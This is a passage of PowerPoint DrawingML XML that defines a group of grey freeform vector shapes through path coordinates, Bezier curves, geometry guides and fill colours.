                  <a:gd name="T6" fmla="*/ 900 w 1354"/>
                  <a:gd name="T7" fmla="*/ 172 h 309"/>
                  <a:gd name="T8" fmla="*/ 255 w 1354"/>
                  <a:gd name="T9" fmla="*/ 0 h 309"/>
                  <a:gd name="T10" fmla="*/ 0 w 1354"/>
                  <a:gd name="T11" fmla="*/ 68 h 309"/>
                  <a:gd name="T12" fmla="*/ 902 w 1354"/>
                  <a:gd name="T13" fmla="*/ 309 h 309"/>
                  <a:gd name="T14" fmla="*/ 1157 w 1354"/>
                  <a:gd name="T15" fmla="*/ 240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54" h="309">
                    <a:moveTo>
                      <a:pt x="1157" y="240"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1354" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1098" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="900" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1157" y="240"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="777777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33" name="Freeform 984">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED1D4F3A-2535-416E-8EB9-88D56653A0C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83" y="1872"/>
                <a:ext cx="254" cy="200"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 902 w 902"/>
                  <a:gd name="T1" fmla="*/ 241 h 709"/>
                  <a:gd name="T2" fmla="*/ 900 w 902"/>
                  <a:gd name="T3" fmla="*/ 709 h 709"/>
                  <a:gd name="T4" fmla="*/ 0 w 902"/>
                  <a:gd name="T5" fmla="*/ 468 h 709"/>
                  <a:gd name="T6" fmla="*/ 0 w 902"/>
                  <a:gd name="T7" fmla="*/ 0 h 709"/>
                  <a:gd name="T8" fmla="*/ 902 w 902"/>
                  <a:gd name="T9" fmla="*/ 241 h 7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02" h="709">
                    <a:moveTo>
                      <a:pt x="902" y="241"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="900" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="241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34" name="Freeform 985">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A290DE36-50B0-43D3-AEC8-FB67041D3CE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637" y="1906"/>
                <a:ext cx="128" cy="167"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 257 w 454"/>
                  <a:gd name="T1" fmla="*/ 51 h 590"/>
                  <a:gd name="T2" fmla="*/ 454 w 454"/>
                  <a:gd name="T3" fmla="*/ 0 h 590"/>
                  <a:gd name="T4" fmla="*/ 454 w 454"/>
                  <a:gd name="T5" fmla="*/ 196 h 590"/>
                  <a:gd name="T6" fmla="*/ 454 w 454"/>
                  <a:gd name="T7" fmla="*/ 467 h 590"/>
                  <a:gd name="T8" fmla="*/ 0 w 454"/>
                  <a:gd name="T9" fmla="*/ 590 h 590"/>
                  <a:gd name="T10" fmla="*/ 2 w 454"/>
                  <a:gd name="T11" fmla="*/ 120 h 590"/>
                  <a:gd name="T12" fmla="*/ 257 w 454"/>
                  <a:gd name="T13" fmla="*/ 51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4" h="590">
                    <a:moveTo>
                      <a:pt x="257" y="51"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="454" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="51"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="C0C0C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700" name="Group 357">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{684093D7-6482-4391-AB0B-0901074571A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891485" y="2823792"/>
              <a:ext cx="542804" cy="533281"/>
              <a:chOff x="762" y="611"/>
              <a:chExt cx="2797" cy="2753"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2212" name="Freeform 358">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89235E1C-9CFC-45EC-9ABB-102E9849E27B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861" y="611"/>
                <a:ext cx="1786" cy="2415"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 743 w 756"/>
                  <a:gd name="T1" fmla="*/ 46 h 1022"/>
                  <a:gd name="T2" fmla="*/ 743 w 756"/>
                  <a:gd name="T3" fmla="*/ 46 h 1022"/>
                  <a:gd name="T4" fmla="*/ 743 w 756"/>
                  <a:gd name="T5" fmla="*/ 20 h 1022"/>
                  <a:gd name="T6" fmla="*/ 710 w 756"/>
                  <a:gd name="T7" fmla="*/ 11 h 1022"/>
                  <a:gd name="T8" fmla="*/ 704 w 756"/>
                  <a:gd name="T9" fmla="*/ 10 h 1022"/>
                  <a:gd name="T10" fmla="*/ 502 w 756"/>
                  <a:gd name="T11" fmla="*/ 149 h 1022"/>
                  <a:gd name="T12" fmla="*/ 502 w 756"/>
                  <a:gd name="T13" fmla="*/ 149 h 1022"/>
                  <a:gd name="T14" fmla="*/ 178 w 756"/>
                  <a:gd name="T15" fmla="*/ 570 h 1022"/>
                  <a:gd name="T16" fmla="*/ 168 w 756"/>
                  <a:gd name="T17" fmla="*/ 585 h 1022"/>
                  <a:gd name="T18" fmla="*/ 90 w 756"/>
                  <a:gd name="T19" fmla="*/ 700 h 1022"/>
                  <a:gd name="T20" fmla="*/ 63 w 756"/>
                  <a:gd name="T21" fmla="*/ 986 h 1022"/>
                  <a:gd name="T22" fmla="*/ 63 w 756"/>
                  <a:gd name="T23" fmla="*/ 986 h 1022"/>
                  <a:gd name="T24" fmla="*/ 104 w 756"/>
                  <a:gd name="T25" fmla="*/ 997 h 1022"/>
                  <a:gd name="T26" fmla="*/ 144 w 756"/>
                  <a:gd name="T27" fmla="*/ 966 h 1022"/>
                  <a:gd name="T28" fmla="*/ 144 w 756"/>
                  <a:gd name="T29" fmla="*/ 1011 h 1022"/>
                  <a:gd name="T30" fmla="*/ 183 w 756"/>
                  <a:gd name="T31" fmla="*/ 1022 h 1022"/>
                  <a:gd name="T32" fmla="*/ 719 w 756"/>
                  <a:gd name="T33" fmla="*/ 262 h 1022"/>
                  <a:gd name="T34" fmla="*/ 719 w 756"/>
                  <a:gd name="T35" fmla="*/ 217 h 1022"/>
                  <a:gd name="T36" fmla="*/ 743 w 756"/>
                  <a:gd name="T37" fmla="*/ 46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56" h="1022">
                    <a:moveTo>
                      <a:pt x="743" y="46"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="743" y="46"/>
                      <a:pt x="743" y="46"/>
                      <a:pt x="743" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="743" y="20"/>
                      <a:pt x="743" y="20"/>
                      <a:pt x="743" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="710" y="11"/>
                      <a:pt x="710" y="11"/>
                      <a:pt x="710" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="708" y="11"/>
                      <a:pt x="706" y="10"/>
                      <a:pt x="704" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="653" y="0"/>
                      <a:pt x="573" y="58"/>
                      <a:pt x="502" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="502" y="149"/>
                      <a:pt x="502" y="149"/>
                      <a:pt x="502" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="570"/>
                      <a:pt x="178" y="570"/>
                      <a:pt x="178" y="570"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="575"/>
                      <a:pt x="171" y="580"/>
                      <a:pt x="168" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="619"/>
                      <a:pt x="114" y="657"/>
                      <a:pt x="90" y="700"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="842"/>
                      <a:pt x="0" y="969"/>
                      <a:pt x="63" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="986"/>
                      <a:pt x="63" y="986"/>
                      <a:pt x="63" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="997"/>
                      <a:pt x="104" y="997"/>
                      <a:pt x="104" y="997"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="966"/>
                      <a:pt x="144" y="966"/>
                      <a:pt x="144" y="966"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="1011"/>
                      <a:pt x="144" y="1011"/>
                      <a:pt x="144" y="1011"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="1022"/>
                      <a:pt x="183" y="1022"/>
                      <a:pt x="183" y="1022"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="719" y="262"/>
                      <a:pt x="719" y="262"/>
                      <a:pt x="719" y="262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="719" y="217"/>
                      <a:pt x="719" y="217"/>
                      <a:pt x="719" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="747" y="146"/>
                      <a:pt x="756" y="84"/>
                      <a:pt x="743" y="46"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="545554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13" name="Freeform 359">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF6D403F-522D-496B-AA53-5A374C07A857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953" y="635"/>
                <a:ext cx="1795" cy="2391"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 719 w 760"/>
                  <a:gd name="T1" fmla="*/ 16 h 1012"/>
                  <a:gd name="T2" fmla="*/ 704 w 760"/>
                  <a:gd name="T3" fmla="*/ 10 h 1012"/>
                  <a:gd name="T4" fmla="*/ 502 w 760"/>
                  <a:gd name="T5" fmla="*/ 149 h 1012"/>
                  <a:gd name="T6" fmla="*/ 502 w 760"/>
                  <a:gd name="T7" fmla="*/ 150 h 1012"/>
                  <a:gd name="T8" fmla="*/ 178 w 760"/>
                  <a:gd name="T9" fmla="*/ 571 h 1012"/>
                  <a:gd name="T10" fmla="*/ 168 w 760"/>
                  <a:gd name="T11" fmla="*/ 585 h 1012"/>
                  <a:gd name="T12" fmla="*/ 91 w 760"/>
                  <a:gd name="T13" fmla="*/ 700 h 1012"/>
                  <a:gd name="T14" fmla="*/ 68 w 760"/>
                  <a:gd name="T15" fmla="*/ 987 h 1012"/>
                  <a:gd name="T16" fmla="*/ 144 w 760"/>
                  <a:gd name="T17" fmla="*/ 966 h 1012"/>
                  <a:gd name="T18" fmla="*/ 144 w 760"/>
                  <a:gd name="T19" fmla="*/ 1012 h 1012"/>
                  <a:gd name="T20" fmla="*/ 719 w 760"/>
                  <a:gd name="T21" fmla="*/ 262 h 1012"/>
                  <a:gd name="T22" fmla="*/ 719 w 760"/>
                  <a:gd name="T23" fmla="*/ 218 h 1012"/>
                  <a:gd name="T24" fmla="*/ 719 w 760"/>
                  <a:gd name="T25" fmla="*/ 16 h 10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60" h="1012">
                    <a:moveTo>
                      <a:pt x="719" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="715" y="13"/>
                      <a:pt x="710" y="11"/>
                      <a:pt x="704" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="654" y="0"/>
                      <a:pt x="573" y="58"/>
                      <a:pt x="502" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="502" y="150"/>
                      <a:pt x="502" y="150"/>
                      <a:pt x="502" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="571"/>
                      <a:pt x="178" y="571"/>
                      <a:pt x="178" y="571"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="175" y="575"/>
                      <a:pt x="172" y="580"/>
                      <a:pt x="168" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="619"/>
                      <a:pt x="114" y="658"/>
                      <a:pt x="91" y="700"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="846"/>
                      <a:pt x="0" y="974"/>
                      <a:pt x="68" y="987"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="991"/>
                      <a:pt x="115" y="984"/>
                      <a:pt x="144" y="966"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="1012"/>
                      <a:pt x="144" y="1012"/>
                      <a:pt x="144" y="1012"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="719" y="262"/>
                      <a:pt x="719" y="262"/>
                      <a:pt x="719" y="262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="719" y="218"/>
                      <a:pt x="719" y="218"/>
                      <a:pt x="719" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="759" y="119"/>
                      <a:pt x="760" y="38"/>
                      <a:pt x="719" y="16"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A0A0A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14" name="Freeform 360">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DE717A1-AE4C-48C2-828B-B75157ED13D5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293" y="2792"/>
                <a:ext cx="813" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 813"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 813 w 813"/>
                  <a:gd name="T3" fmla="*/ 217 h 451"/>
                  <a:gd name="T4" fmla="*/ 813 w 813"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 0 w 813"/>
                  <a:gd name="T7" fmla="*/ 234 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 813"/>
                  <a:gd name="T9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3" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="813" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="451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A0A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15" name="Freeform 361">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB5BE024-453C-4E9E-BF68-C37585BD680E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293" y="2731"/>
                <a:ext cx="1040" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 813 w 1040"/>
                  <a:gd name="T1" fmla="*/ 278 h 278"/>
                  <a:gd name="T2" fmla="*/ 1040 w 1040"/>
                  <a:gd name="T3" fmla="*/ 217 h 278"/>
                  <a:gd name="T4" fmla="*/ 227 w 1040"/>
                  <a:gd name="T5" fmla="*/ 0 h 278"/>
                  <a:gd name="T6" fmla="*/ 0 w 1040"/>
                  <a:gd name="T7" fmla="*/ 61 h 278"/>
                  <a:gd name="T8" fmla="*/ 813 w 1040"/>
                  <a:gd name="T9" fmla="*/ 27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0" h="278">
                    <a:moveTo>
                      <a:pt x="813" y="278"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1040" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="278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16" name="Freeform 362">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8748865-39AE-4515-8C0F-3B6768460E2F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520" y="2497"/>
                <a:ext cx="813" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 813"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 813 w 813"/>
                  <a:gd name="T3" fmla="*/ 217 h 451"/>
                  <a:gd name="T4" fmla="*/ 813 w 813"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 0 w 813"/>
                  <a:gd name="T7" fmla="*/ 234 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 813"/>
                  <a:gd name="T9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3" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="813" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="451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A0A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17" name="Freeform 363">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{329912D7-AE78-4C97-B9C8-03B316566070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520" y="2435"/>
                <a:ext cx="1039" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 813 w 1039"/>
                  <a:gd name="T1" fmla="*/ 279 h 279"/>
                  <a:gd name="T2" fmla="*/ 1039 w 1039"/>
                  <a:gd name="T3" fmla="*/ 218 h 279"/>
                  <a:gd name="T4" fmla="*/ 227 w 1039"/>
                  <a:gd name="T5" fmla="*/ 0 h 279"/>
                  <a:gd name="T6" fmla="*/ 0 w 1039"/>
                  <a:gd name="T7" fmla="*/ 62 h 279"/>
                  <a:gd name="T8" fmla="*/ 813 w 1039"/>
                  <a:gd name="T9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9" h="279">
                    <a:moveTo>
                      <a:pt x="813" y="279"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1039" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="279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18" name="Freeform 364">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23A1F998-94C9-43DE-89F0-AE3D42777C4E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747" y="2201"/>
                <a:ext cx="812" cy="452"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 812"/>
                  <a:gd name="T1" fmla="*/ 0 h 452"/>
                  <a:gd name="T2" fmla="*/ 812 w 812"/>
                  <a:gd name="T3" fmla="*/ 218 h 452"/>
                  <a:gd name="T4" fmla="*/ 812 w 812"/>
                  <a:gd name="T5" fmla="*/ 452 h 452"/>
                  <a:gd name="T6" fmla="*/ 0 w 812"/>
                  <a:gd name="T7" fmla="*/ 234 h 452"/>
                  <a:gd name="T8" fmla="*/ 0 w 812"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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2" h="452">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="812" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="452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A0A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19" name="Freeform 365">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE68A2E1-A51C-4547-B22D-2F7CE4253D97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747" y="2140"/>
                <a:ext cx="1037" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 812 w 1037"/>
                  <a:gd name="T1" fmla="*/ 279 h 279"/>
                  <a:gd name="T2" fmla="*/ 1037 w 1037"/>
                  <a:gd name="T3" fmla="*/ 217 h 279"/>
                  <a:gd name="T4" fmla="*/ 226 w 1037"/>
                  <a:gd name="T5" fmla="*/ 0 h 279"/>
                  <a:gd name="T6" fmla="*/ 0 w 1037"/>
                  <a:gd name="T7" fmla="*/ 61 h 279"/>
                  <a:gd name="T8" fmla="*/ 812 w 1037"/>
                  <a:gd name="T9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7" h="279">
                    <a:moveTo>
                      <a:pt x="812" y="279"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1037" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="279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20" name="Freeform 366">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA508927-C102-43B4-B7D0-1901AB18A57B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973" y="1906"/>
                <a:ext cx="811" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 811"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 811 w 811"/>
                  <a:gd name="T3" fmla="*/ 217 h 451"/>
                  <a:gd name="T4" fmla="*/ 811 w 811"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 0 w 811"/>
                  <a:gd name="T7" fmla="*/ 234 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 811"/>
                  <a:gd name="T9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1" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="811" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811" y="451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A0A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21" name="Freeform 367">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D131A62-EF07-49E2-B6AC-633ADAA984A3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973" y="1845"/>
                <a:ext cx="1037" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 811 w 1037"/>
                  <a:gd name="T1" fmla="*/ 278 h 278"/>
                  <a:gd name="T2" fmla="*/ 1037 w 1037"/>
                  <a:gd name="T3" fmla="*/ 217 h 278"/>
                  <a:gd name="T4" fmla="*/ 227 w 1037"/>
                  <a:gd name="T5" fmla="*/ 0 h 278"/>
                  <a:gd name="T6" fmla="*/ 0 w 1037"/>
                  <a:gd name="T7" fmla="*/ 61 h 278"/>
                  <a:gd name="T8" fmla="*/ 811 w 1037"/>
                  <a:gd name="T9" fmla="*/ 27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7" h="278">
                    <a:moveTo>
                      <a:pt x="811" y="278"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1037" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="811" y="278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22" name="Freeform 368">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32A17047-EF7B-476A-8AA7-077409628633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200" y="1611"/>
                <a:ext cx="810" cy="451"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 810"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 810 w 810"/>
                  <a:gd name="T3" fmla="*/ 217 h 451"/>
                  <a:gd name="T4" fmla="*/ 810 w 810"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 0 w 810"/>
                  <a:gd name="T7" fmla="*/ 234 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 810"/>
                  <a:gd name="T9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0" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="810" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="810" y="451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A0A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23" name="Freeform 369">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96D8DA6D-65BE-41D7-A7B2-ACFD87D303E7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200" y="1549"/>
                <a:ext cx="1037" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 810 w 1037"/>
                  <a:gd name="T1" fmla="*/ 279 h 279"/>
                  <a:gd name="T2" fmla="*/ 1037 w 1037"/>
                  <a:gd name="T3" fmla="*/ 218 h 279"/>
                  <a:gd name="T4" fmla="*/ 225 w 1037"/>
                  <a:gd name="T5" fmla="*/ 0 h 279"/>
                  <a:gd name="T6" fmla="*/ 0 w 1037"/>
                  <a:gd name="T7" fmla="*/ 62 h 279"/>
                  <a:gd name="T8" fmla="*/ 810 w 1037"/>
                  <a:gd name="T9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7" h="279">
                    <a:moveTo>
                      <a:pt x="810" y="279"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1037" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="810" y="279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24" name="Freeform 370">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{258848F9-00DF-4588-8CE0-7E204FC9CEAC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425" y="1315"/>
                <a:ext cx="812" cy="452"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 812"/>
                  <a:gd name="T1" fmla="*/ 0 h 452"/>
                  <a:gd name="T2" fmla="*/ 812 w 812"/>
                  <a:gd name="T3" fmla="*/ 218 h 452"/>
                  <a:gd name="T4" fmla="*/ 812 w 812"/>
                  <a:gd name="T5" fmla="*/ 452 h 452"/>
                  <a:gd name="T6" fmla="*/ 0 w 812"/>
                  <a:gd name="T7" fmla="*/ 234 h 452"/>
                  <a:gd name="T8" fmla="*/ 0 w 812"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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2" h="452">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="812" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="452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A0A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25" name="Freeform 371">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71DE530F-096D-4B31-B4B5-10FC4CF06B4B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425" y="1254"/>
                <a:ext cx="1039" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 812 w 1039"/>
                  <a:gd name="T1" fmla="*/ 279 h 279"/>
                  <a:gd name="T2" fmla="*/ 1039 w 1039"/>
                  <a:gd name="T3" fmla="*/ 220 h 279"/>
                  <a:gd name="T4" fmla="*/ 226 w 1039"/>
                  <a:gd name="T5" fmla="*/ 0 h 279"/>
                  <a:gd name="T6" fmla="*/ 0 w 1039"/>
                  <a:gd name="T7" fmla="*/ 61 h 279"/>
